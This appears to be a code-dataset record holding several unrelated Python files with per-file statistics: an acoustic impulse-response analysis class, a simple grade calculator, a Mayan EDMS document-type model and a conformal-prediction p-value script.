slope_end = np.argwhere(windows <= noise_floor + slope_end_headroom)[0, 0] - 1 # 8 dB above noise level
slope_start = np.argwhere(windows <= noise_floor + (slope_end_headroom + slope_dynamic_range))[0, 0] - 1
late_slope, late_intercept, _, _, _ = stats.linregress(
t_windows[slope_start:slope_end],
windows[slope_start:slope_end]
)
except (IndexError, ValueError):
# Problems with already cropped IR tail
break
# print(f' Late slope {t_windows[slope_start] * 1000:.0f} ms -> {t_windows[slope_end] * 1000:.0f} ms: {late_slope:.1f}t + {late_intercept:.2f}')
# 9. A new knee_point is found.
knee_point_time = (noise_floor - late_intercept) / late_slope
if knee_point_time > t_windows[-1]:
knee_point_time = t_windows[-1]
break
knee_point_index = np.argwhere(t_windows >= knee_point_time)[0, 0]
knee_point_value = windows[knee_point_index]
# print(f' Knee point: {knee_point_value:.2f} dB @ {knee_point_time * 1000:.0f} ms')
# Index of first window which comes after slope end time
new_knee_point_index = np.argwhere(t_windows >= knee_point_time)[0, 0]
if new_knee_point_index == knee_point_index:
# Converged
knee_point_index = new_knee_point_index
break
else:
knee_point_index = new_knee_point_index
# Until this point knee_point_index has been an index to windows,
# find the index to impulse response data
knee_point_time = t_windows[knee_point_index]
knee_point_index = np.argwhere(t_squared >= knee_point_time)[0, 0]
return peak_index, peak_index + knee_point_index, noise_floor, w
def decay_times(self, peak_ind=None, knee_point_ind=None, noise_floor=None, window_size=None):
"""Calculates decay times EDT, RT20, RT30, RT60
Args:
peak_ind: Peak index as returned by `decay_params()`. Optional.
knee_point_ind: Knee point index as returned by `decay_params()`. Optional.
noise_floor: Noise floor as returned by `decay_params()`. Optional.
window_size: Moving average window size as returned by `decay_params()`. Optional.
Returns:
- EDT, None if SNR < 10 dB
- RT20, None if SNR < 35 dB
- RT30, None if SNR < 45 dB
- RT60, None if SNR < 75 dB
"""
if peak_ind is None or knee_point_ind is None or noise_floor is None:
peak_ind, knee_point_ind, noise_floor, window_size = self.decay_params()
t = np.linspace(0, self.duration(), len(self))
knee_point_ind -= (peak_ind + 0)
data = self.data.copy()
data = data[peak_ind - 0 * self.fs // 1000:]
data /= np.max(np.abs(data))
# analytical = np.abs(signal.hilbert(data)) # Hilbert doesn't work will with broadband signa
analytical = np.abs(data)
schroeder = np.cumsum(analytical[knee_point_ind::-1] ** 2 / np.sum(analytical[:knee_point_ind] ** 2))[:0:-1]
schroeder = 10 * np.log10(schroeder)
# Moving average of the squared impulse response
avg = self.data.copy()
# Truncate data to avoid unnecessary computations
# Ideally avg_head is the half window size but this might not be possible if the IR has been truncated already
# and the peak is closer to the start than half window
avg_head = min((window_size // 2), peak_ind)
avg_tail = min((window_size // 2), len(avg) - (peak_ind + knee_point_ind))
# We need an index offset for average curve if the avg_head is not half window
avg_offset = window_size // 2 - avg_head
avg = avg[peak_ind - avg_head:peak_ind + knee_point_ind + avg_tail] # Truncate
avg /= np.max(np.abs(avg)) # Normalize
avg = avg ** 2
avg = running_mean(avg, window_size)
avg = 10 * np.log10(avg + 1e-18)
# Find offset which minimizes difference between Schroeder backward integral and the moving average
# ie. offset which moves Schroeder curve to same vertical position as the decay power curve
# Limit the range 10% -> 90% of Schroeder and avg start and end
fit_start = max(int(len(schroeder) * 0.1), avg_offset) # avg could start after 10% of Schroeder
fit_end = min(int(len(schroeder) * 0.9), avg_offset + (len(avg))) # avg could end before 90% of Schroeder
offset = np.mean(
schroeder[fit_start:fit_end] -
avg[fit_start - avg_offset:fit_end - avg_offset] # Shift avg indexes by the offset length
)
decay_times = dict()
limits = [(-1, -10, -10, 'EDT'), (-5, -25, -20, 'RT20'), (-5, -35, -30, 'RT30'), (-5, -65, -60, 'RT60')]
for start_target, end_target, decay_target, name in limits:
decay_times[name] = None
if end_target < noise_floor + offset + 10:
# There has to be at least 10 dB of headroom between the end target point and noise floor,
# in this case there is not. Current decay time shall remain undefined.
continue
try:
start = np.argwhere(schroeder <= start_target)[0, 0]
end = np.argwhere(schroeder <= end_target)[0, 0]
except IndexError as err:
# Targets not found on the Schroeder curve
continue
slope, intercept, _, _, _ = stats.linregress(t[start:end], schroeder[start:end])
decay_times[name] = decay_target / slope
return decay_times['EDT'], decay_times['RT20'], decay_times['RT30'], decay_times['RT60']
def crop_head(self, head_ms=1):
"""Crops away head."""
self.data = self.data[self.peak_index() - int(self.fs * head_ms / 1000):]
def equalize(self, fir):
"""Equalizes this impulse response with give FIR filter.
Args:
fir: FIR filter as an single dimensional array
Returns:
None
"""
self.data = signal.convolve(self.data, fir, mode='full')
def resample(self, fs):
"""Resamples this impulse response to the given sampling rate."""
self.data = nnresample.resample(self.data, fs, self.fs)
self.fs = fs
def convolve(self, x):
"""Convolves input data with this impulse response
Args:
x: Input data to be convolved
Returns:
Convolved data
"""
return signal.convolve(x, self.data, mode='full')
def adjust_decay(self, target):
"""Adjusts decay time in place.
Args:
target: Target 60 dB decay time in seconds
Returns:
None
"""
peak_index, knee_point_index, _, _ = self.decay_params()
edt, rt20, rt30, rt60 = self.decay_times()
rt_slope = None
# Finds largest available decay time parameter
for rt_time, rt_level in [(edt, -10), (rt20, -20), (rt30, -30), (rt60, -60)]:
if not rt_time:
break
rt_slope = rt_level / rt_time
target_slope = -60 / target # Target dB/s
if target_slope > rt_slope:
# We're not going to adjust decay and noise floor up
return
knee_point_time = knee_point_index / self.fs
knee_point_level = rt_slope * knee_point_time # Extrapolated level at knee point
target_level = target_slope * knee_point_time # Target level at knee point
window_level = target_level - knee_point_level # Adjustment level at knee point
window_start = peak_index + 2 * (self.fs // 1000)
half_window = knee_point_index - window_start # Half Hanning window length, from peak to knee
window = np.concatenate([ # Adjustment window
np.ones(window_start), # Start with ones until peak
signal.windows.hann(half_window * 2)[half_window:], # Slope down to knee point
np.zeros(len(self) - knee_point_index) # Fill with zeros to full length
]) - 1.0 # Slopes down from 0.0 to -1.0
window *= -window_level # Scale with adjustment level at knee point
window = 10 ** (window / 20) # Linear scale
self.data *= window # Scale impulse response data wit the window
def magnitude_response(self):
"""Calculates magnitude response for the data."""
return magnitude_response(self.data, self.fs)
def frequency_response(self):
"""Creates FrequencyResponse instance."""
f, m = self.magnitude_response()
n = self.fs / 2 / 4 # 4 Hz resolution
step = int(len(f) / n)
fr = FrequencyResponse(name='Frequency response', frequency=f[1::step], raw=m[1::step])
fr.interpolate(f_step=1.01, f_min=10, f_max=self.fs / 2)
return fr
def plot(self,
fig=None,
ax=None,
plot_file_path=None,
plot_recording=True,
plot_spectrogram=True,
plot_ir=True,
plot_fr=True,
plot_decay=True,
plot_waterfall=True):
"""Plots all plots into the same figure
Args:
fig: Figure instance
ax: Axes instance, must have 2 rows and 3 columns
plot_file_path: Path to a file for saving the plot
plot_recording: Plot recording waveform?
plot_spectrogram: Plot recording spectrogram?
plot_ir: Plot impulse response?
plot_fr: Plot frequency response?
plot_decay: Plot decay curve?
plot_waterfall: Plot waterfall graph?
Returns:
Figure
"""
if fig is None:
# Create figure and axises for the plots
fig = plt.figure()
fig.set_size_inches(22, 10)
ax = []
for i in range(5):
ax.append(fig.add_subplot(2, 3, i + 1))
ax.append(fig.add_subplot(2, 3, 6, projection='3d'))
ax = np.vstack([ax[:3], ax[3:]])
if plot_recording:
self.plot_recording(fig=fig, ax=ax[0, 0])
if plot_spectrogram:
self.plot_spectrogram(fig=fig, ax=ax[1, 0])
if plot_ir:
self.plot_ir(fig=fig, ax=ax[0, 1])
if plot_fr:
self.plot_fr(fig=fig, ax=ax[1, 1])
if plot_decay:
self.plot_decay(fig=fig, ax=ax[0, 2])
if plot_waterfall:
self.plot_waterfall(fig=fig, ax=ax[1, 2])
if plot_file_path:
fig.savefig(plot_file_path)
return fig
def plot_recording(self, fig=None, ax=None, plot_file_path=None):
"""Plots recording wave form
Args:
fig: Figure instance
ax: Axes instance
plot_file_path: Path to a file for saving the plot
Returns:
- Figure
- Axes
"""
if self.recording is None or len(np.nonzero(self.recording)[0]) == 0:
return
if fig is None:
fig, ax = plt.subplots()
t = np.linspace(0, len(self.recording) / self.fs, len(self.recording))
ax.plot(t, self.recording, color=COLORS['blue'], linewidth=0.5)
ax.grid(True)
ax.set_xlabel('Time (s)')
ax.set_ylabel('Amplitude')
ax.set_title('Sine Sweep')
# Save image
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_spectrogram(self, fig=None, ax=None, plot_file_path=None, f_res=10, n_segments=200):
"""Plots spectrogram for a logarithmic sine sweep recording.
Args:
fig: Figure instance
ax: Axis instance
plot_file_path: Path to a file for saving the plot
f_res: Frequency resolution (step) in Hertz
n_segments: Number of segments in time axis
Returns:
- Figure
- Axis
"""
if self.recording is None or len(np.nonzero(self.recording)[0]) == 0:
return
if fig is None:
fig, ax = plt.subplots()
# Window length in samples
nfft = int(self.fs / f_res)
# Overlapping in samples
noverlap = int(nfft - (len(self.recording) - nfft) / n_segments)
# Get spectrogram data
spectrum, freqs, t = specgram(self.recording, Fs=self.fs, NFFT=nfft, noverlap=noverlap, mode='psd')
# Remove zero frequency
f = freqs[1:]
z = spectrum[1:, :]
# Logarithmic power
z = 10 * np.log10(z)
# Create spectrogram image
t, f = np.meshgrid(t, f)
cs = ax.pcolormesh(t, f, z, cmap='gnuplot2', vmin=-150, shading='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(cs, cax=cax)
ax.semilogy()
ax.yaxis.set_major_formatter(ticker.StrMethodFormatter('{x:.0f}'))
ax.set_xlabel('Time (s)')
ax.set_ylabel('Frequency (Hz)')
ax.set_title('Spectrogram')
# Save image
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_ir(self, fig=None, ax=None, start=0.0, end=None, plot_file_path=None):
"""Plots impulse response wave form.
Args:
fig: Figure instance
ax: Axis instance
start: Start of the plot in seconds
end: End of the plot in seconds
plot_file_path: Path to a file for saving the plot
Returns:
None
"""
if end is None:
end = len(self.data) / self.fs
ir = self.data[int(start * self.fs):int(end * self.fs)]
if fig is None:
fig, ax = plt.subplots()
t = np.arange(start * 1000, start * 1000 + 1000 / self.fs * len(ir), 1000 / self.fs)
ax.plot(t, ir, color=COLORS['blue'], linewidth=0.5)
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Amplitude')
ax.grid(True)
ax.set_title('Impulse response'.format(ms=int(end * 1000)))
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_fr(self,
fr=None,
fig=None,
ax=None,
plot_file_path=None,
plot_raw=True,
raw_color='#7db4db',
plot_smoothed=True,
smoothed_color='#1f77b4',
plot_error=True,
error_color='#dd8081',
plot_error_smoothed=True,
error_smoothed_color='#d62728',
plot_target=True,
target_color='#ecdef9',
plot_equalization=True,
equalization_color='#2ca02c',
plot_equalized=True,
equalized_color='#680fb9',
fix_ylim=False):
"""Plots frequency response
Args:
fr: FrequencyResponse instance. Useful for passing instance with taget, error, equalization etc...
fig: Figure instance
ax: Axes instance
plot_file_path: Path to a file for saving the plot
plot_raw: Include raw curve?
raw_color: Color of raw curve
plot_smoothed: Include smoothed curve?
smoothed_color: Color of smoothed curve
plot_error: Include unsmoothed error curve?
error_color: Color of error curve
plot_error_smoothed: Include smoothed error curve?
error_smoothed_color: Color of smoothed error curve
plot_target: Include target curve?
target_color: Color of target curve
plot_equalization: Include equalization curve?
equalization_color: Color of equalization curve
plot_equalized: Include equalized curve?
equalized_color: Color of equalized curve
fix_ylim: Fix Y-axis limits calculation?
Returns:
- Figure
- Axes
"""
if fr is None:
fr = self.frequency_response()
fr.smoothen_fractional_octave(window_size=1/3, treble_f_lower=20000, treble_f_upper=23999)
if fig is None:
fig, ax = plt.subplots()
ax.set_xlabel('Frequency (Hz)')
ax.semilogx()
ax.set_xlim([20, 20e3])
ax.set_ylabel('Amplitude (dB)')
ax.set_title(fr.name)
ax.grid(True, which='major')
ax.grid(True, which='minor')
ax.xaxis.set_major_formatter(ticker.StrMethodFormatter('{x:.0f}'))
legend = []
v = []
sl = np.logical_and(fr.frequency >= 20, fr.frequency <= 20000)
if plot_target and len(fr.target):
ax.plot(fr.frequency, fr.target, linewidth=5, color=target_color)
legend.append('Target')
v.append(fr.target[sl])
if plot_raw and len(fr.raw):
ax.plot(fr.frequency, fr.raw, linewidth=0.5, color=raw_color)
legend.append('Raw')
v.append(fr.raw[sl])
if plot_error and len(fr.error):
ax.plot(fr.frequency, fr.error, linewidth=0.5, color=error_color)
legend.append('Error')
v.append(fr.error[sl])
if plot_smoothed and len(fr.smoothed):
ax.plot(fr.frequency, fr.smoothed, linewidth=1, color=smoothed_color)
legend.append('Raw Smoothed')
v.append(fr.smoothed[sl])
if plot_error_smoothed and len(fr.error_smoothed):
ax.plot(fr.frequency, fr.error_smoothed, linewidth=1, color=error_smoothed_color)
legend.append('Error Smoothed')
v.append(fr.error_smoothed[sl])
if plot_equalization and len(fr.equalization):
ax.plot(fr.frequency, fr.equalization, linewidth=1, color=equalization_color)
legend.append('Equalization')
v.append(fr.equalization[sl])
if plot_equalized and len(fr.equalized_raw) and not len(fr.equalized_smoothed):
ax.plot(fr.frequency, fr.equalized_raw, linewidth=1, color=equalized_color)
legend.append('Equalized raw')
v.append(fr.equalized_raw[sl])
if plot_equalized and len(fr.equalized_smoothed):
ax.plot(fr.frequency, fr.equalized_smoothed, linewidth=1, color=equalized_color)
legend.append('Equalized smoothed')
v.append(fr.equalized_smoothed[sl])
if fix_ylim:
# Y axis limits
lower, upper = get_ylim(v)
ax.set_ylim([lower, upper])
ax.legend(legend, fontsize=8)
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_decay(self, fig=None, ax=None, plot_file_path=None):
"""Plots decay graph.
Args:
fig: Figure instance. New will be created if None is passed.
ax: Axis instance. New will be created if None is passed to fig.
plot_file_path: Save plot figure to a file.
Returns:
- Figure
- Axes
"""
if fig is None:
fig, ax = plt.subplots()
peak_ind, knee_point_ind, noise_floor, window_size = self.decay_params()
start = max(0, (peak_ind - 2 * (knee_point_ind - peak_ind)))
end = min(len(self), (peak_ind + 2 * (knee_point_ind - peak_ind)))
t = np.arange(start, end) / self.fs
squared = self.data.copy()
squared /= np.max(np.abs(squared))
squared = squared[start:end] ** 2
avg = running_mean(squared, window_size)
squared = 10 * np.log10(squared + 1e-24)
avg = 10 * np.log10(avg + 1e-24)
ax.plot(t * 1000, squared, color=COLORS['lightblue'], label='Squared impulse response')
ax.plot(
t[window_size // 2:window_size // 2 + len(avg)] * 1000, avg, color=COLORS['blue'],
label=f'{window_size / self.fs *1000:.0f} ms moving average'
)
ax.set_ylim([np.min(avg) * 1.2, 0])
ax.set_xlim([
start / self.fs * 1000,
end / self.fs * 1000
])
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Amplitude (dBr)')
ax.grid(True, which='major')
ax.set_title('Decay')
ax.legend(loc='upper right')
if plot_file_path:
fig.savefig(plot_file_path)
return fig, ax
def plot_waterfall(self, fig=None, ax=None):
""""""
if fig is None:
fig, ax = plt.subplots()
z_min = -100
# Window
window_duration = 0.01 # TODO
nfft = min(int(self.fs * window_duration), int(len(self.data) / 10))
noverlap = int(nfft * 0.9) # 90% overlap TODO
ascend_ms = 10 # 10 ms ascending window
ascend = int(ascend_ms / 1000 * self.fs)
plateu = int((nfft - ascend) * 3 / 4) # 75%
descend = nfft - ascend - plateu # 25%
window = np.concatenate([
signal.hann(ascend * 2)[:ascend],
np.ones(plateu),
signal.hann(descend * 2)[descend:]
])
# Crop from 10ms before peak to start of tail
peak_ind, tail_ind, noise_floor, _ = self.decay_params()
start = max(int(peak_ind - self.fs * 0.01), 0)
# Stop index is greater of 1s after peak or 1 FFT window after tail
stop = min(int(round(max(peak_ind + self.fs * 1, tail_ind + nfft))), len(self.data))
data = self.data[start:stop]
# Get spectrogram data
spectrum, freqs, t = specgram(data, Fs=self.fs, NFFT=nfft, noverlap=noverlap, mode='magnitude', window=window)
# Remove 0 Hz component
spectrum = spectrum[1:, :]
freqs = freqs[1:]
# Interpolate to logaritmic frequency scale
f_max = self.fs / 2
f_min = 10
step = 1.03
f = np.array([f_min * step ** i for i in range(int(np.log(f_max / f_min) / np.log(step)))])
log_f_spec = np.ones((len(f), spectrum.shape[1]))
for i in range(spectrum.shape[1]):
interpolator = interpolate.InterpolatedUnivariateSpline(np.log10(freqs), spectrum[:, i], k=1)
log_f_spec[:, i] = interpolator(np.log10(f))
z = log_f_spec
f = np.log10(f)
# Normalize and turn to dB scale
z /= np.max(z)
z = np.clip(z, 10**(z_min/20), np.max(z))
z = 20 * np.log10(z)
# Smoothen
z = ndimage.uniform_filter(z, size=3, mode='constant')
t, f = np.meshgrid(t, f)
# Smoothing creates "walls", remove them
t = t[1:-1, :-1] * 1000 # Milliseconds
f = f[1:-1, :-1]
z = z[1:-1, :-1]
# Surface plot
ax.plot_surface(t, f, z, rcount=len(t), ccount=len(f), cmap='magma', antialiased=True, vmin=z_min, vmax=0)
# Z axis
ax.set_zlim([z_min, 0])
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# X axis
ax.set_xlim([0, None])
ax.set_xlabel('Time (ms)')
# Y axis
ax.set_ylim(np.log10([20, 20000]))
ax.set_ylabel('Frequency (Hz)')
ax.yaxis.set_major_formatter(FuncFormatter(lambda x, p: f'{10 ** x:.0f}'))
# Orient
ax.view_init(30, 30)
return fig, ax
| 41.883963 | 161 | 0.596451 | 4,328 | 32,125 | 4.287431 | 0.142098 | 0.032496 | 0.015521 | 0.007329 | 0.27673 | 0.227743 | 0.178056 | 0.147769 | 0.118075 | 0.104441 | 0 | 0.028502 | 0.30649 | 32,125 | 766 | 162 | 41.938642 | 0.804076 | 0.313805 | 0 | 0.248276 | 0 | 0 | 0.026902 | 0 | 0 | 0 | 0 | 0.002611 | 0 | 1 | 0.048276 | false | 0 | 0.029885 | 0.002299 | 0.126437 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bb9de9c7b1a8928e1670e934477a453bb8d2a1 | 680 | py | Python | Program Hitung Nilai Raport.py | Rizalgente/Program-hitung-nilai-raport | 0044bee8dfb28e9d16f0a4fa5e544ac3a16b9aa6 | [
"MIT"
] | null | null | null | Program Hitung Nilai Raport.py | Rizalgente/Program-hitung-nilai-raport | 0044bee8dfb28e9d16f0a4fa5e544ac3a16b9aa6 | [
"MIT"
] | null | null | null | Program Hitung Nilai Raport.py | Rizalgente/Program-hitung-nilai-raport | 0044bee8dfb28e9d16f0a4fa5e544ac3a16b9aa6 | [
"MIT"
] | null | null | null | print('====PROGRAM HITUNG NILAI RAPORT====\n'.center(50))
while True:
nilai_ujian1 = int(input("# Masukan Nilai Ujian Pertama: "))
nilai_ujian2 = int(input("# Masukan Nilai Ujian Kedua: "))
nilai_ujian3 = int(input("# Masukan Nilai Ujian Ketiga: "))
hasil = (nilai_ujian1+nilai_ujian2+nilai_ujian3) / 3
print("Total Nilai Yang Anda Dapatkan Adalah: {}".format(hasil))
nilai = hasil
if nilai >= 95:
print("Nilai anda A\n")
elif nilai >= 80:
print("Nilai anda B\n")
elif nilai >= 65:
print("Nilai anda C\n")
elif nilai >= 50:
print("Nilai anda D\n")
continue
else:
print("Nilai anda E\n")
| 32.380952 | 68 | 0.602941 | 92 | 680 | 4.391304 | 0.434783 | 0.123762 | 0.173267 | 0.148515 | 0.185644 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033399 | 0.251471 | 680 | 20 | 69 | 34 | 0.760314 | 0 | 0 | 0 | 0 | 0 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.368421 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bc368e54ecd0e6a0a4e46893e6e90b38f8e219 | 6,903 | py | Python | mayan/apps/documents/models/document_type_models.py | wan1869/wan-edms | e2a2c8d9e8dd60c6ea716ac5a963a71bcc326a6b | [
"Apache-2.0"
] | 1 | 2021-02-24T15:03:23.000Z | 2021-02-24T15:03:23.000Z | mayan/apps/documents/models/document_type_models.py | ass-a2s/Mayan-EDMS | 5769f26abc56f92f8edb9d311cabf659dc0535c1 | [
"Apache-2.0"
] | null | null | null | mayan/apps/documents/models/document_type_models.py | ass-a2s/Mayan-EDMS | 5769f26abc56f92f8edb9d311cabf659dc0535c1 | [
"Apache-2.0"
] | 1 | 2021-04-30T09:44:14.000Z | 2021-04-30T09:44:14.000Z | import logging
from django.apps import apps
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from mayan.apps.acls.models import AccessControlList
from mayan.apps.common.literals import TIME_DELTA_UNIT_CHOICES
from mayan.apps.common.serialization import yaml_load
from mayan.apps.common.validators import YAMLValidator
from ..classes import BaseDocumentFilenameGenerator
from ..events import event_document_type_created, event_document_type_edited
from ..literals import DEFAULT_DELETE_PERIOD, DEFAULT_DELETE_TIME_UNIT
from ..managers import DocumentTypeManager
from ..permissions import permission_document_view
from ..settings import setting_language
__all__ = ('DocumentType', 'DocumentTypeFilename')
logger = logging.getLogger(name=__name__)
class DocumentType(models.Model):
"""
Define document types or classes to which a specific set of
properties can be attached
"""
label = models.CharField(
help_text=_('The name of the document type.'), max_length=96,
unique=True, verbose_name=_('Label')
)
trash_time_period = models.PositiveIntegerField(
blank=True, help_text=_(
'Amount of time after which documents of this type will be '
'moved to the trash.'
), null=True, verbose_name=_('Trash time period')
)
trash_time_unit = models.CharField(
blank=True, choices=TIME_DELTA_UNIT_CHOICES, null=True, max_length=8,
verbose_name=_('Trash time unit')
)
delete_time_period = models.PositiveIntegerField(
blank=True, default=DEFAULT_DELETE_PERIOD, help_text=_(
'Amount of time after which documents of this type in the trash '
'will be deleted.'
), null=True, verbose_name=_('Delete time period')
)
delete_time_unit = models.CharField(
blank=True, choices=TIME_DELTA_UNIT_CHOICES,
default=DEFAULT_DELETE_TIME_UNIT, max_length=8, null=True,
verbose_name=_('Delete time unit')
)
filename_generator_backend = models.CharField(
default=BaseDocumentFilenameGenerator.get_default(), help_text=_(
'The class responsible for producing the actual filename used '
'to store the uploaded documents.'
), max_length=224, verbose_name=_('Filename generator backend')
)
filename_generator_backend_arguments = models.TextField(
blank=True, help_text=_(
'The arguments for the filename generator backend as a '
'YAML dictionary.'
), validators=[YAMLValidator()], verbose_name=_(
'Filename generator backend arguments'
)
)
objects = DocumentTypeManager()
class Meta:
ordering = ('label',)
verbose_name = _('Document type')
verbose_name_plural = _('Documents types')
def __str__(self):
return self.label
def delete(self, *args, **kwargs):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
for document in Document.objects.filter(document_type=self):
document.delete(to_trash=False)
return super(DocumentType, self).delete(*args, **kwargs)
@property
def deleted_documents(self):
DeletedDocument = apps.get_model(
app_label='documents', model_name='DeletedDocument'
)
return DeletedDocument.objects.filter(document_type=self)
def get_absolute_url(self):
return reverse(
viewname='documents:document_type_document_list', kwargs={
'document_type_id': self.pk
}
)
def get_document_count(self, user):
queryset = AccessControlList.objects.restrict_queryset(
permission=permission_document_view, queryset=self.documents,
user=user
)
return queryset.count()
def get_upload_filename(self, instance, filename):
generator_klass = BaseDocumentFilenameGenerator.get(
name=self.filename_generator_backend
)
generator_instance = generator_klass(
**yaml_load(
stream=self.filename_generator_backend_arguments or '{}'
)
)
return generator_instance.upload_to(
instance=instance, filename=filename
)
def natural_key(self):
return (self.label,)
def new_document(
self, file_object, label=None, description=None, language=None,
_user=None
):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
try:
document = Document(
description=description or '', document_type=self,
label=label or file_object.name,
language=language or setting_language.value
)
document.save(_user=_user)
except Exception as exception:
logger.critical(
'Unexpected exception while trying to create new document '
'"%s" from document type "%s"; %s',
label or file_object.name, self, exception
)
raise
else:
try:
document_version = document.new_version(
file_object=file_object, _user=_user
)
except Exception as exception:
logger.critical(
'Unexpected exception while trying to create initial '
'version for document %s; %s',
label or file_object.name, exception
)
raise
else:
return document, document_version
def save(self, *args, **kwargs):
user = kwargs.pop('_user', None)
created = not self.pk
result = super(DocumentType, self).save(*args, **kwargs)
if created:
event_document_type_created.commit(
actor=user, target=self
)
else:
event_document_type_edited.commit(
actor=user, target=self
)
return result
class DocumentTypeFilename(models.Model):
"""
List of labels available to a specific document type for the
quick rename functionality
"""
document_type = models.ForeignKey(
on_delete=models.CASCADE, related_name='filenames', to=DocumentType,
verbose_name=_('Document type')
)
filename = models.CharField(
db_index=True, max_length=128, verbose_name=_('Label')
)
enabled = models.BooleanField(default=True, verbose_name=_('Enabled'))
class Meta:
ordering = ('filename',)
unique_together = ('document_type', 'filename')
verbose_name = _('Quick label')
verbose_name_plural = _('Quick labels')
def __str__(self):
return self.filename
| 33.673171 | 77 | 0.636969 | 729 | 6,903 | 5.791495 | 0.248285 | 0.045476 | 0.039792 | 0.013501 | 0.236144 | 0.17243 | 0.137376 | 0.12648 | 0.11748 | 0.11748 | 0 | 0.002012 | 0.280168 | 6,903 | 204 | 78 | 33.838235 | 0.847655 | 0.025206 | 0 | 0.149701 | 0 | 0 | 0.137369 | 0.005531 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05988 | false | 0 | 0.08982 | 0.023952 | 0.299401 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bc9da991f1852bdbaaee4bfb91787bb957cf51 | 2,783 | py | Python | conf_pred_postproc.py | FredrikSvenssonUK/tox21_conformal | a77a87a1bdefd058b3285d7ee1c65bcbdf8eb1d4 | [
"MIT"
] | 2 | 2021-07-19T04:30:20.000Z | 2021-12-24T00:18:37.000Z | conf_pred_postproc.py | FredrikSvenssonUK/tox21_conformal | a77a87a1bdefd058b3285d7ee1c65bcbdf8eb1d4 | [
"MIT"
] | null | null | null | conf_pred_postproc.py | FredrikSvenssonUK/tox21_conformal | a77a87a1bdefd058b3285d7ee1c65bcbdf8eb1d4 | [
"MIT"
] | 1 | 2021-07-19T04:30:21.000Z | 2021-07-19T04:30:21.000Z | #!/usr/bin/env python
# imports
import os,sys
from bisect import bisect_left
from bisect import bisect_right
import numpy as np
from numpy.core.numeric import asanyarray
import sklearn
import pandas as pd
def search(alist, item):
'Locate the leftmost value exactly equal to item'
i = bisect_right(alist, item)
return i
############## main program ###################
try:
sys.argv[1]
except IndexError:
print ("You need to specify and input file with combined calibration and test set scores")
sys.exit(1)
try:
sys.argv[2]
except IndexError:
print ("You need to specify maximum number of models to use (<0 = all models)")
sys.exit(1)
aa = sys.argv[1] + '_p-values_pred.csv'
f = open(aa,'w')
f.write('Title\tPred\tp-value low class\tp-value high class\tpred_class_0.2\tclass\tloop\n')
df = pd.read_csv(sys.argv[1], sep='\t', header = 0, index_col = None)
dfhigh = df.loc[df['class'] > 0]
dflow = df.loc[df['class'] <= 0]
maxmodel = df['model'].max()
if int(sys.argv[2]) > 0:
maxmodel = int(sys.argv[2])
print (maxmodel)
for model in range(0, maxmodel+1):
print ('model', model)
calibrhigh = df.loc[df['class'] > 0]
calibrhigh = calibrhigh.loc[calibrhigh['model'] == model]
print(calibrhigh)
calibrhigh = calibrhigh.loc[calibrhigh['set'] == 'cal']
calibrhigh = calibrhigh['score_high']
calibrsort1 = np.sort(calibrhigh, axis=None)
calibrsort1 = calibrsort1.astype(float)
calibrlow = df.loc[df['class'] <= 0]
calibrlow = calibrlow.loc[calibrlow['model'] == model]
#print(calibrlow)
calibrlow = calibrlow.loc[calibrlow['set'] == 'cal']
calibrlow = calibrlow['score_low']
calibrsort0 = np.sort(calibrlow, axis=None)
calibrsort0 = calibrsort0.astype(float)
lencl0 = len(calibrsort0)
lencl1 = len(calibrsort1)
#print (lencl0, lencl1)
test = df.loc[df['model'] == model]
test = test.loc[test['set'] == 'test']
testid = test['id']
testclass = test['class']
testhigh = asanyarray(test['score_high'])
testlow = asanyarray(test['score_low'])
ll = len(testclass)
for yy in range(0, ll):
pos0 = search(calibrsort0, testlow[yy])
pos1 = search(calibrsort1, testhigh[yy])
lencl00 = lencl0 + 1
pos0 = float(pos0)/float(lencl00)
lencl11 = lencl1 + 1
pos1 = float(pos1)/float(lencl11)
testid = asanyarray(test['id'])
testclass = asanyarray(testclass)
write0 = str(testid[yy]) + '\tNA\t' + str(pos0) + '\t' + str(pos1) + '\tNA\t' + str(testclass[yy]) + '\t' + str(model) + '\n'
f.write(write0)
f.close()
print ('Finished')
